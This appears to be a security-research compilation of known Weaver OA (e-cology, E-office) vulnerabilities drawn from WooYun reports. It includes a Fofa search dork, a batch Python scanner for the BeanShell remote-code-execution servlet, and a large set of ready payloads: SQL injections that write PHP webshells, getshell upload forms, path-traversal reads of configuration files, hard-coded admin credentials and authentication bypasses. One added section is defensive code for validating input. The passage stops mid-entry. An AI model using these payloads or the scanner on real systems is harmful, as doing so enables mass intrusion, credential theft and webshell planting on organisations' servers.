Security research - Weaver OA (泛微OA)


Endpoints

/login/Login.jsp?logintype=1  # front-end (user) login

 

2019
Weaver e-cology OA database configuration information disclosure
Affects 8.0 and 9.0, among others
/mobile/dbconfigreader.jsp

2019
Weaver e-cology OA V8 and V9 SQL injection (no public PoC found yet)


2019 Weaver e-cology OA remote code execution

Fofa dork: app="泛微-協同辦公OA"

0x02 Affected range

Includes but is not limited to 7.0, 8.0, 8.1
/weaver/bsh.servlet.BshServlet/

Single | batch PoC

import requests
import argparse

# Target servlet from the write-up above: /weaver/bsh.servlet.BshServlet
# (the original script dropped the trailing "t" from the path and could never hit it)
BSH_PATH = "/weaver/bsh.servlet.BshServlet"
RESULT_FILE = "vuln_list.txt"  # one file name throughout (the original mixed Vuln_list.txt and vuln_list.txt)


def verify(url, payload):
    url = url.strip()
    if not url.startswith("http"):
        url = "http://" + url
    furl = url.rstrip("/") + BSH_PATH
    with open(RESULT_FILE, "a") as vlist:
        try:
            res = requests.post(furl, data=payload, timeout=10)
            # BeanShell answers a failed evaluation with "Error: ..."; anything else means the script ran
            if res.status_code == 200 and "Error:" not in res.text:
                print(furl + " is a vuln [Verify Success!]\n")
                vlist.write(url + "\n")
            # else:
            #     print(str(res.status_code) + "\n" + furl + "\n")
        except Exception:
            return


def ecologyexp(urls, mode):
    payload = {"bsh.script": "exec(\"whoami\")", "bsh.servlet.output": "raw"}
    mode = str(mode)  # argparse default is the int 1, so compare as strings
    if mode == "1":
        verify(urls, payload)
    elif mode == "2":
        with open(urls) as ufile:
            for url in ufile:
                if not url.strip():
                    continue
                try:
                    verify(url, payload)
                except Exception as e:
                    print(e)
                    continue


parser = argparse.ArgumentParser(
    description="e-cology verify",
    epilog="python e-cology-EXP.py -u url -m 1 || python e-cology-EXP.py -ul url.txt -m 2",
)
parser.add_argument("--url", "-u", help="single target, e.g. http://host:port")
parser.add_argument("--mode", "-m", help="1 = single url, 2 = file with one url per line", default=1)
parser.add_argument("--urlList", "-ul", help="url list file (implies mode 2)")
parser.add_argument("--level", "-lv", help="unused", default=1)

if __name__ == "__main__":
    args = parser.parse_args()
    with open(RESULT_FILE, "w") as vf:
        vf.write("vuln_list\n")
    try:
        if args.urlList is not None:
            ecologyexp(args.urlList, "2")
        else:
            ecologyexp(args.url, args.mode)
    except Exception as e:
        print(e)

CNVD-2019-34241
/mobile/browser/WorkflowCenterTreeData.jsp
Affected versions
Weaver e-cology OA, JSP edition
Payload (sent as the formids parameter):
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%
0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

 

 

Defect ID: wooyun-2015-0132247
Title: one generic SQL injection in the Weaver OA office system (login required)
Affects 6.0 and 7.0
/workflow/FormBillBrowser.jsp
Parameter: formName, concatenated into the SQL statement without filtering


wooyun-2015-0137850
Weaver OA generic arbitrary file upload getshell (with an official-site example)
Affects 6.0, 7.0, 7.100, 8.0 (login required)
/page/maint/common/UserResourceUpload.jsp?dir=/
(1) the upload filter can be bypassed (change the extension: 1.jsp., 1.jspx; 0x00 truncation)
(2) the upload path is controllable (the dir parameter)
payload:
<form method='post' action='http://xxxx/page/maint/common/UserResourceUpload.jsp?dir=/' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>


wooyun-2015-0140003
Three generic SQL injections in Weaver OA, bundled (reproducible on the official site, no login)
(1) /mobile/plugin/loadWfGraph.jsp  // requestid
(2) //ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1  // nodeid
(3) //ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2*  // id

 


Defect ID: wooyun-2016-0178866
Title: a Weaver OA interface executes arbitrary SQL statements without login (script attached)
/ws  /ws/query?wsdl  XML injection


Defect ID: wooyun-2016-0169872
Title: a flaw in Weaver OA allows listing and manipulating files on the system
Hard-coded credentials in plugin\ewe\jsp\config.jsp:
sUsername = "sysadmin";
sPassword = "weaversoft"
(1) /plugin/ewe/admin/default.jsp: create a file 1.txt
(2) delete files outside the intended directory: /plugin/ewe/admin/upload.jsp?id=11&dir=../../../../


wooyun-2015-0155705
Weaver OA unauthenticated GetShell
/sysinterface/codeEdit.jsp?filename=ccccc.jsp&filetype=jsp
Path of the written webshell: /sysinterface/extpage/ccccc.jsp
The path is controllable:
/sysinterface/codeEdit.jsp?filename=。../../ccccc.jsp&filetype=jsp
Path of the written webshell: http://url/ccccc.jsp


Defect ID: wooyun-2015-0141834
Title: Yurun Group (雨潤集團) Weaver OA, arbitrary upload via a form gives a shell
/tools/SWFUpload/upload.jsp
payload:
<form method='post' action='http://url/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>
Path of the uploaded webshell: http://url/shell.jsp


Defect ID: wooyun-2015-0138725
Title: Weaver OA generic SQL injection (reproducible on the official site, no login)
/mobile/plugin/PreDownload.jsp  // url parameter, concatenated into SQL without filtering


Defect ID: wooyun-2015-0132258
Title: SQL injection in Weaver OA (test script attached)
/ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385f6013c2385f6720002&language=zh_CN&labelParams=  // keywordid, Oracle boolean-based blind injection
Reflected XSS: /main/login.jsp
Payload: 1'"()&%<ScRiPt >prompt(930551)</ScRiPt>


Defect ID: wooyun-2015-0129483
Title: Weaver OA sensitive file accessible without authorization
/messager/users.data  // XML data, base64-encoded (encoded, not encrypted)


Defect ID: wooyun-2015-0127502
Title: a generic injection in Weaver OA (no login required)
/web/WebSearchDsp.jsp?key=1  // key


Defect ID: wooyun-2015-0125738
Title: Weaver OA vulnerability bundle
SQL injection (login required)
(1)
http://pm.weaver.cn:9085/ServiceAction/com.eweaver.workflow.request.servlet.RequestlogAction?action=getrelog&requestid=402880484c2a7512014e52de46894dc5  // requestid
(2)
/ServiceAction/com.eweaver.base.orgunit.servlet.OrgunitTreeAction?action=getChildrenExt&type=orgdef&sqlwhere=&node=Orgunit_402881e70ad1d990010ad1e5ec930008&reftype=402881e510e8223c0110e83d427f0018  // reftype

Broken access control (login required)
(1)
/main/main.jsp: personal information -> upload avatar image -> intercept the GET request (it can be replayed directly in the browser)
/humres/base/uploadavatar.jsp?id=4022141241232  (change id to overwrite another user's avatar)
(2)
/ServiceAction/com.eweaver.base.security.servlet.SysuserAction?action=modifyAccountStatus&id=<user id>&v=0&fieldName=isclosed  // changes another user's account status without authorization (v controls whether the user may log in; it maps to the isclosed column of the sysuser table)

Stored XSS (login required)
Personal center -> personal information -> details -> English name

 

Defect ID: wooyun-2015-0104678 (Weaver OA e-Mobile)
Title: generic injection in a Weaver OA component (5 cases)
Versions 4.5 and 4.6 are injectable; boolean-based blind / time-based
Payload:
-1' OR (8705=8705) AND 'a'='a

 

Defect ID: wooyun-2014-076191
Title: Weaver OA vulnerability collection 2 (SQL injection / file upload getshell)
0x01: SQL injection, 4 locations
(1)
POST /general/new_mytable/content_list/
content_-99.php?user_id=WV00000045&lang=cn HTTP/1.1
block_id=1901&body_width=1121&_=  // block_id
(2)
/general/address/view/view_detail.php?ADD_ID=-169%20UNION%20SELECT%201,2,3,4,5,6,version(),8,9,database(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46  // ADD_ID
(3)
/general/address/docenter/export_do.php?group_id=19%20UNION%20SELECT%20user(),database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16  // group_id
(4)
/general/file_folder/file_new/neworedit/getContentByType.php?type=1&content_id=319*&SORT_ID=148&FILE_SORT=1  // content_id

0x02: file upload leading to getshell
/general/workflow/input_form/input_form.php?RUN_ID=5557&FLOW_ID=3115&PRCS_ID=1&FLOW_PRCS=1&FUNC_ID=
// csv --> php

 

Defect ID: wooyun-2014-074972
Title: Weaver OA vulnerability collection (SQL injection, unauthorized access, etc.)
0x01: broken access control (login required)
(1)
/general/email/new/index.php?EMAIL_ID=7  // EMAIL_ID
(2)
/ikernel/admin/
0x02: SQL injection (login required)
(1)
/ikernel/admin/IK_TABLE/field/?TABLE_ID=9  // TABLE_ID
0x03: file download
/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
0x04: file upload
/general/email/  internal mail -> new mail -> upload a ".php4" file
Shell check: /attachment/<partial path found in the page source>/<file name>.php4

 


Defect ID: wooyun-2014-069288
Title: several back-end injections in Weaver OA (verified on the official demo)
(1)
/systeminfo/sysadmin/sysadminEdit.jsp?id=1  // id, administrator privileges required
(2)
//cowork/CoworkLogView.jsp?id=151  // id, ordinary user privileges
(3)
/system/basedata/basedata_role.jsp?roleid=32  // roleid, ordinary user privileges
(4)
//system/basedata/basedata_hrm.jsp?resourceid=3  // resourceid, ordinary user privileges

 


Defect ID: wooyun-2013-039855
Title: Weaver E-office OA management system # verifying that the SQL injection, arbitrary file download and file upload flaws are generic
(1) phpmyadmin  # reachable without authentication
(2) SQL injection
/general/news/show/read_news.php?NEWS_ID=214%20and%201=2%20union%20select%201,user(),database(),4,5,6  // NEWS_ID
(3) file download
/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843
/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843  (Zend-encoded)
/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/mysql_config.ini&ATTACHMENT_ID=5402024843

(4) file upload
My homepage -> edit work plan -> attachment upload -> php4
Shell address: /attachment/xxx/shell.php4

 

Defect ID: WooYun-2015-0124589
Title: a generic Weaver system has a SQL injection (no login required)
(1)
/main/login.jsp  username: sysadmin'  --> the error is echoed back
Captured request:
/j_acegi_security_check?dynamicpass=&encData=&ip=xxxxx&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin'&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin'  // j_username
(2)
/ServiceAction/com.eweaver.base.DataAction?sql=%20select%20*%20from%20v$version%20where%20rownum%20=%201  // returns the database version

 

wooyun-2015-0124788
1. Unauthenticated access and arbitrary file traversal
/weaver/weaver.email.FileDownloadLocation?fileid=46&download=1
/weaver/weaver.file.filedownload?fileid=1
2. SQL injection
/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1  (Weaver OA 7)  // fileid

 

Defect ID: WooYun-2013-038914
Title: Weaver E-office OA management system, arbitrary file download and file upload leading to arbitrary code execution (getshell confirmed)
File upload
Reading the source of inc/utility_all.php shows that attachments are stored at attachment/$ATTACHMENT_ID/$ATTACHMENT_NAME
Personal diary -> upload attachment, then view the page source to obtain the ATTACHMENT_ID and ATTACHMENT_NAME values
The configuration file shows that .php4 uploads are not blocked, so a shell can be obtained directly (runs with SYSTEM privileges)

 


wooyun-2015-0124027 (arbitrary SQL statement execution)
/ServiceAction/com.eweaver.base.DataAction?sql=select LONGONNAME from SYSUSER where LOGONPASS = '<password, base64-encoded>'


applychen (wooyun-2010-034523) Weaver E-office OA management system SQL injection (no details found)
wooyun-2010-0137042 (no details found)

 

Defect ID: wooyun-2016-0215533
Title: Weaver eweaver arbitrary database operation
/ws/query  // the queryBy method of the web service implementation class QueryServiceImpl executes the caller's database statements

 

Defect ID: wooyun-2016-0191882
Title: SQL injection in all versions of Weaver ecology (official site as example), part two
Requires an ordinary user account
Affected range:
8.100.0531+KB81001511, 7.100.0331, 5.000.0327+KB50001107, 4.100.0919

 

Defect ID: wooyun-2016-0198158
Title: Weaver ecology unauthenticated SQL injection 2 + arbitrary file read
(1) SQL injection
The markId parameter in the SignatureDownLoad class is not filtered
(2) File read
The markPath parameter is controllable

 


Defect ID: wooyun-2016-0169453
Title: SQL injection in Weaver collaborative commerce system e-cology (verification relay script attached)
//services/  // XML injection

 


Defect ID: wooyun-2015-0164133
Title: the Weaver e-office official site exposes registrant information and lets product information be changed
/eoffice_web/index.php?s=/admin/settings/register.html
/eoffice_web/index.php?s=/admin/update/update_list.html

 


Defect ID: wooyun-2015-0148980
Title: a design flaw in a generic Weaver system allows directory listing and GetShell (login required)
1. Directory listing
//document/imp/filebrowser.jsp?dir=D:\\
2. File upload (login required)
xxx/base/skin/skincreate.jsp
Shell path: /css/skins/skin4/shell.jsp

 

Defect ID: wooyun-2015-0141786
Title: unauthenticated SQL injection in Weaver e-cology delegated administration (reproduced at a Fortune 500 company and on the demo)
/login/Login.jsp?logintype=1
Capture the login request ->
/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit=  // loginid

 


Defect ID: wooyun-2015-0136818
Title: Weaver e-cology, four generic SQL injections (the same four pages exist under /pweb and /web)
1 injection point /pweb/careerapply/HrmCareerApplyPerEdit.jsp, parameter id
2 injection point /pweb/careerapply/HrmCareerApplyPerView.jsp, parameter id
3 injection point /pweb/careerapply/HrmCareerApplyWorkEdit.jsp, parameter id
4 injection point /pweb/careerapply/HrmCareerApplyWorkView.jsp, parameter id
5 injection point /web/careerapply/HrmCareerApplyPerEdit.jsp, parameter id
6 injection point /web/careerapply/HrmCareerApplyPerView.jsp, parameter id
7 injection point /web/careerapply/HrmCareerApplyWorkEdit.jsp, parameter id
8 injection point /web/careerapply/HrmCareerApplyWorkView.jsp

 


Defect ID: wooyun-2015-0136823
Title: Weaver e-cology, six generic SQL injections
1 injection point /web/broswer/SectorInfoBrowser.jsp, parameter sqlwhere
2 injection point /web/broswer/CustomerTypeBrowser.jsp, parameter sqlwhere
3 injection point /web/broswer/CustomerSizeBrowser.jsp, parameter sqlwhere
4 injection point /web/broswer/CustomerDescBrowser.jsp, parameter sqlwhere
5 injection point /web/broswer/ContacterTitleBrowser.jsp, parameter sqlwhere
6 injection point /web/broswer/CityBrowser.jsp, parameter sqlwhere

 


Defect ID: wooyun-2015-0136828
Title: a Weaver system has a generic injection (official site and China Mobile as examples)
(1)
/login.do -> capture the login request -> /verifyLogin.do  // loginid
payload:
loginid: aaa' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a
password: 1
(2)
/client.do?method=getlist&sessionkey=xxx&module=7&scope=4&pageindex=1&keyword=1  // keyword (login required)

 

Defect ID: wooyun-2015-0134994
Title: Weaver e-cology generic SQL injection (script attached)
/web/careerapply/HrmCareerApplyAdd.jsp  // careerid

 


Defect ID: wooyun-2015-0130759
Title: an OA platform leaks every account's password, administrators included, without login (Weaver's own management system was accessed this way)
/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER

 

Defect ID: wooyun-2015-0128007
Title: Weaver eoffice front-end getshell + one minor issue (no login required)
(1) SQL injection
/inc/group_user_list/group_xml.php  // par (the value is a base64-encoded [key]:[value]|[key]:[value] list)
Payload:
[group]:[1]|[groupid]:[1']  =>  W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxJ10=
[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/axxxxxxxx.php']  =>  W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L2F4eHh4eHh4eC5waHAnXQ==
(2) Unauthenticated access
/UserSelect/main.php
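The par parameter above (and the userpriv parameter of priv_xml.php later on this page) carries a base64-encoded list in the form [key]:[value]|[key]:[value]. The following Python is an added example, not code from the original report or from Weaver: it encodes and decodes that format so the two payloads above can be reproduced and inspected, and shows the whitelist check a fixed endpoint would apply before building SQL. The key names group and groupid are the ones shown on the page; treating only decimal ids as valid is an assumption about what legitimate input looks like.

```python
import base64
import re

# Pairs are serialised as [key]:[value]|[key]:[value]. Values may contain spaces and
# quotes, so the value group runs lazily up to a "]" that is followed by "|" or the end.
PAIR_RE = re.compile(r"\[([^\]]*)\]:\[(.*?)\](?=\||$)", re.S)

# First payload from the page, used here as the sample input.
PAGE_PAYLOAD_B64 = "W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxJ10="


def encode_par(fields):
    """Serialise (key, value) pairs into the par format and base64-encode the result."""
    raw = "|".join(f"[{k}]:[{v}]" for k, v in fields)
    return base64.b64encode(raw.encode("utf-8")).decode("ascii")


def decode_par(par_b64):
    """Reverse of encode_par: base64-decode and split back into an ordered list of pairs."""
    raw = base64.b64decode(par_b64).decode("utf-8", errors="replace")
    return [(m.group(1), m.group(2)) for m in PAIR_RE.finditer(raw)]


def validate_par(par_b64, allowed_keys=("group", "groupid")):
    """Whitelist check a fixed endpoint would run before touching SQL (assumed rule:
    known keys only, values must be plain decimal ids). Returns a list of
    (key, value, reason) rejections; an empty list means the input is acceptable."""
    problems = []
    for key, value in decode_par(par_b64):
        if key not in allowed_keys:
            problems.append((key, value, "unexpected key"))
        elif not re.fullmatch(r"[0-9]+", value):
            problems.append((key, value, "non-numeric id"))
    return problems


if __name__ == "__main__":
    print(decode_par(PAGE_PAYLOAD_B64))        # [('group', '1'), ('groupid', "1'")]
    print(validate_par(PAGE_PAYLOAD_B64))      # the stray quote in groupid is rejected
    print(validate_par(encode_par([("group", "1"), ("groupid", "1")])))  # []
```

Because the injection is inside a base64 blob, a WAF that only inspects raw query strings never sees the quote; the check has to run after decoding, as validate_par does.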

 

Defect ID: wooyun-2015-0127270
Title: Weaver eoffice, two SQL injections bundled + one access-control bypass (no login required)
(1) SQL injection
/E-mobile/calendar_page.php  // detailid
/E-mobile/diarymy_page.php  // start
Payload:
1,1 procedure analyse((select IF(MID(user(),1,1)=114, sleep(5),1)),1)
(2) Broken access control
E-mobile/email_page.php  // detailid

 

 

Defect ID: wooyun-2015-0126024
Title: Weaver E-office injection series, unauthenticated injections 1-20 (official-site examples attached)
(1)
/E-mobile/flowdo_page.php?diff=delete&RUN_ID=1  // parameter RUN_ID
(2)
/E-mobile/flowdo_page.php?diff=delete&flowid=1  // parameter flowid
(3)
/E-mobile/flowsorce_page.php?flowid=2  // flowid
(4)
/E-mobile/flownext_page.php?diff=candeal&detailid=2,3  // parameter detailid
(5)
/E-mobile/flowimage_page.php?FLOW_ID=2  // FLOW_ID
(6)
/E-mobile/flowform_page.php?FLOW_ID=2  // FLOW_ID
(7)
/E-mobile/diaryother_page.php?searchword=23  // searchword
(8)
/E-mobile/create/ajax_do.php?diff=word&sortid=1  // parameter sortid
(9)
/E-mobile/create/ajax_do.php?diff=word&idstr=2  // parameter idstr
(10)
/E-mobile/create/ajax_do.php?diff=addr&sortid=1  // parameter sortid
(11)
/E-mobile/create/ajax_do.php?diff=addr&userdept=1  // parameter userdept
(12)
/E-mobile/create/ajax_do.php?diff=addr&userpriv=1  // parameter userpriv
(13)
/E-mobile/create/ajax_do.php?diff=wordsearch&idstr=1  // parameter idstr
(14)
/E-mobile/flow/flowhave_page.php?detailid=2,3  // detailid
(15)
/E-mobile/flow/flowtype_free.php?flowid=1  // flowid
(16)
/E-mobile/flow/flowtype_free.php?runid=1  // runid
(17)
/E-mobile/flow/flowtype_other.php?flowid=1  // flowid
(18)
/E-mobile/flow/flowtype_other.php?runid=1  // runid
(19)
/E-mobile/flow/freeflowimage_page.php?fromid=2  // fromid
(20)
/E-mobile/flow/freeflowimage_page.php?diff=new&runid=2  // parameter runid

 


Defect ID: wooyun-2015-0125638
Title: Weaver Eoffice, multiple arbitrary file reads in two files / multiple arbitrary file uploads giving a direct getshell
File read
(1)
Payload:
The default read directory is /attachment/
/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
(2)
Payload:
The default read directory is /attachment/
/iweboffice/officeserver.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../mysql_config.ini
(3)
Payload:
The default read directory is /attachment/
/iweboffice/officeserver.php?OPTION=GETFILE&REMOTEFILE=../mysql_config.ini
File upload
(1)
/iweboffice/officeserver.php?OPTION=SAVEFILE&FILENAME=shell.php
Shell path: /attachment/shell.php
(2)
/iweboffice/officeserver.php?OPTION=SAVETEMPLATE&TEMPLATE=shell.php
Shell path: /attachment/shell.php
(3)
case "SAVEASHTML"
(4)
case "SAVEIMAGE"
(5)
case "UPDATEFILE"
(6)
case "PUTFILE"
(7)
/webservice/upload/upload.php
Payload:
<form action="http://host/webservice/upload/upload.php" enctype="multipart/form-data" method="POST">
<input name="file" type="file">
<input name="" type="submit">
</form>
(8)
/webservice-json/upload/upload.php
(9)
/webservice-xml/upload/upload.php

 

 

Defect ID: wooyun-2015-0125592
Title: Weaver Eoffice, three arbitrary file uploads giving a direct getshell
(1)
/webservice/upload.php
Payload:
<form action="http://url/webservice/upload.php" enctype="multipart/form-data" method="POST">
<input name="file" type="file">
<input name="" type="submit">
</form>
(2)
inc/jquery/uploadify/uploadify.php
Payload:
<form action="http://url/inc/jquery/uploadify/uploadify.php" enctype="multipart/form-data" method="POST">
<input name="Filedata" type="file">
<input name="" type="submit">
</form>
(3)
/general/weibo/javascript/LazyUploadify/uploadify.php
Payload:
<form action="http://url/general/weibo/javascript/LazyUploadify/uploadify.php" enctype="multipart/form-data" method="POST">
<input name="Filedata" type="file">
<input name="" type="submit">
</form>
(4)
/general/weibo/javascript/uploadify/uploadify.php
Payload:
POST /general/weibo/javascript/uploadify/uploadify.php?uploadType=shell
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214

-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php

<?php phpinfo();?>
-----------------------------94401197120954--
Shell path: /attachment/shell.php
(5)
/general/weibo/javascript/uploadify/uploadify.php
Payload:
POST /general/weibo/javascript/uploadify/uploadify.php?user_ID=shell
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214

-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php

<?php phpinfo();?>
-----------------------------94401197120954--
Shell path: /attachment/personal/$userID/$userID_temp.php

 

 

Defect ID: wooyun-2015-0125279
Title: Weaver E-office, multiple SQL injections in the same file / user information disclosure (ROOT SHELL)
//webservice/eoffice.wsdl.php?wsdl  (XML injection)

 

 

Defect ID: wooyun-2015-0125286
Title: Weaver e-office arbitrary file download
/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php

 


Defect ID: wooyun-2015-0125282
Title: Weaver E-office, 3 SQL injections (ROOT SHELL) / 2 arbitrary file uploads
XML injection
(1)
webservice-json/login/login.wsdl.php?wsdl
(2)
/webservice/login/login.wsdl.php?wsdl
(3)
//webservice/eoffice.wsdl.php?wsdl
/webservice/eoffice.wsdl.php?wsdl
(4)
/webservice-xml/login/login.wsdl.php?wsdl
File upload
(1)
/webservice/upload.php
Shell path: attachment/$attachmentID  ($attachmentID is echoed back in the response)
(2)
/webservice/upload/upload.php
(3)
webservice-json/upload/upload.php

 


Defect ID: wooyun-2015-0124503
Title: a Weaver Eoffice file has multiple SQL injections and lets the login be bypassed to operate the back end directly
SQL injection
/client_converter.php  // userAccount, lang, funcID
Authentication bypass
Step 1: /client_converter.php?userAccount=admin&lang=cn  (populates the session)
Step 2: /general/system/user/userlist.php

 

 

Defect ID: wooyun-2015-0112675
Title: Weaver's OA system (Weaver E-COLOGY) has a serious information-security vulnerability
/weaver/weaver.file.FileDownload?fileid=12

 


Defect ID: wooyun-2015-0105535
Title: Weaver Eoffice unauthenticated SQL injection (multiple locations)
1
/E-mobile/diarydo.php  // diary_id
2
/E-mobile/notify_page.php  // detailid
3
/E-mobile/emailreply_page.php  // detailid
4
/E-mobile/sms_page.php  // detailid
5
/E-mobile/source_page.php  // emailid

 


Defect ID: wooyun-2015-0105520
Title: Weaver e-office unauthenticated GETSHELL
/E-mobile/Data/login_other.php
The input is passed through stripslashes, which undoes the escaping and lets the injection bypass magic_quotes_gpc
Payload:
/E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}
/e-mobile/Data/login_other.php?diff=sync&auth={%22auths%22:[{%22value%22:%22-1%27%20UNION%20SELECT%201,2,%27%3C?php%20phpinfo();%20?%3E%27,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20into%20outfile%20%27D:/eoffice/webroot/shell.php%27%23%22}]}
Shell path: http://url/shell.php

 

 

Defect ID: wooyun-2015-0105290
Title: one unauthenticated injection in Weaver e-office
/inc/priv_user_list/priv_xml.php  // userpriv (array-style injection; the value must be base64-encoded)

 

 

Defect ID: wooyun-2015-0104799
Title: Weaver Eoffice SQL injection in multiple files, continued (no login required)
/E-mobile/flowimg.php  // FLOW_ID, RUN_ID

 


Defect ID: wooyun-2015-0104782
Title: Weaver Eoffice SQL injection in multiple files (no login required)
(1)
